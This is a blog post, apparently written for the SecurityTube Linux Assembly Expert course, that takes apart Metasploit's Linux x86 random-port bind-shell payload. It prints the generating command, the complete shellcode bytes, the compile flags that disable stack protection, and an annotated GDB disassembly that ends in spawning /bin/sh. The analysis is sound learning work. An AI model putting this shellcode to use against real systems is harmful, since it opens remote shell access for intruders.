Source: SecurityTube
I explain every line witch need explication, I hope it's explained enough, if you don't understand something, leave me a commend and I will explain/respond to all questions.
1) We need generate our payload for post analysis
msfpayload linux/x86/shell_bind_tcp_random_port C /* * linux/x86/shell_bind_tcp_random_port - 57 bytes * http://www.metasploit.com * VERBOSE=false, PrependFork=false, PrependSetresuid=false, * PrependSetreuid=false, PrependSetuid=false, * PrependSetresgid=false, PrependSetregid=false, * PrependSetgid=false, PrependChrootBreak=false, * AppendExit=false */ unsigned char payload[] = "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02\x89\xe1\xcd\x80" "\x52\x50\x89\xe1\xb0\x66\xb3\x04\xcd\x80\xb0\x66\x43\xcd\x80" "\x59\x93\x6a\x3f\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f\x2f" "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\xcd\x80"; compilation - gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcodeSource of .C code can be found here
For start I recommend to you check this my post about Bind shell
2) Analyzing with GDB
gdb -q ./shellcode => 0x0804a040 <+0>: xor ebx,ebx ; 0 0x0804a042 <+2>: mul ebx ; 0 0x0804a044 <+4>: mov al,0x66 ; 102 == socketcall 0x0804a046 <+6>: inc ebx ; 1 == sys_socket -> int socket (int family, int type, int protocol); 0x0804a047 <+7>: push edx ; 0 == system default(tcp/upd) - int protocol 0x0804a048 <+8>: push ebx ; 1 == SOCK_STREAM 0x0804a049 <+9>: push 0x2 ; 2 == AF_INET - int family 0x0804a04b <+11>: mov ecx,esp ; save pointer to args 0x0804a04d <+13>: int 0x80 ; syscall 0x0804a04f <+15>: push edx ; 0 0x0804a050 <+16>: push eax ; 7 0x0804a051 <+17>: mov ecx,esp ; save pointer 0x0804a053 <+19>: mov al,0x66 ; 102 == socketcall 0x0804a055 <+21>: mov bl,0x4 ; 4 == sys_listen 0x0804a057 <+23>: int 0x80 ; syscall 0x0804a059 <+25>: mov al,0x66 ; 102 == socketcall 0x0804a05b <+27>: inc ebx ; 5 == sys_accept as we no pass port, it well be random check man accept for more information 0x0804a05c <+28>: int 0x80 ; syscall 0x0804a05e <+30>: pop ecx ; 7 0x0804a05f <+31>: xchg ebx,eax ; ebx = 8, eax = 5 0x0804a060 <+32>: push 0x3f ; 63 0x0804a062 <+34>: pop eax ; eax = 63 = dup2 redirrect STDIN/STDOUT/STDERR here they do this bucle 8 times from 7 to 0 0x0804a063 <+35>: int 0x80 ; syscall 0x0804a065 <+37>: dec ecx ; ecx -1 0x0804a066 <+38>: jns 0x804a060if ecx > 0 jump to <+32> 0x0804a068 <+40>: mov al,0xb ; 11 == execve 0x0804a06a <+42>: push 0x68732f2f ; hs// 0x0804a06f <+47>: push 0x6e69622f ; nib/ <- /bin/sh start 0x0804a074 <+52>: mov ebx,esp ; save pointer to /bin/bash 0x0804a076 <+54>: inc ecx ; 0 0x0804a077 <+55>: int 0x80 ; syscall 0x0804a079 <+57>: add BYTE PTR [eax],al
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
SLAE-513
No hay comentarios:
Publicar un comentario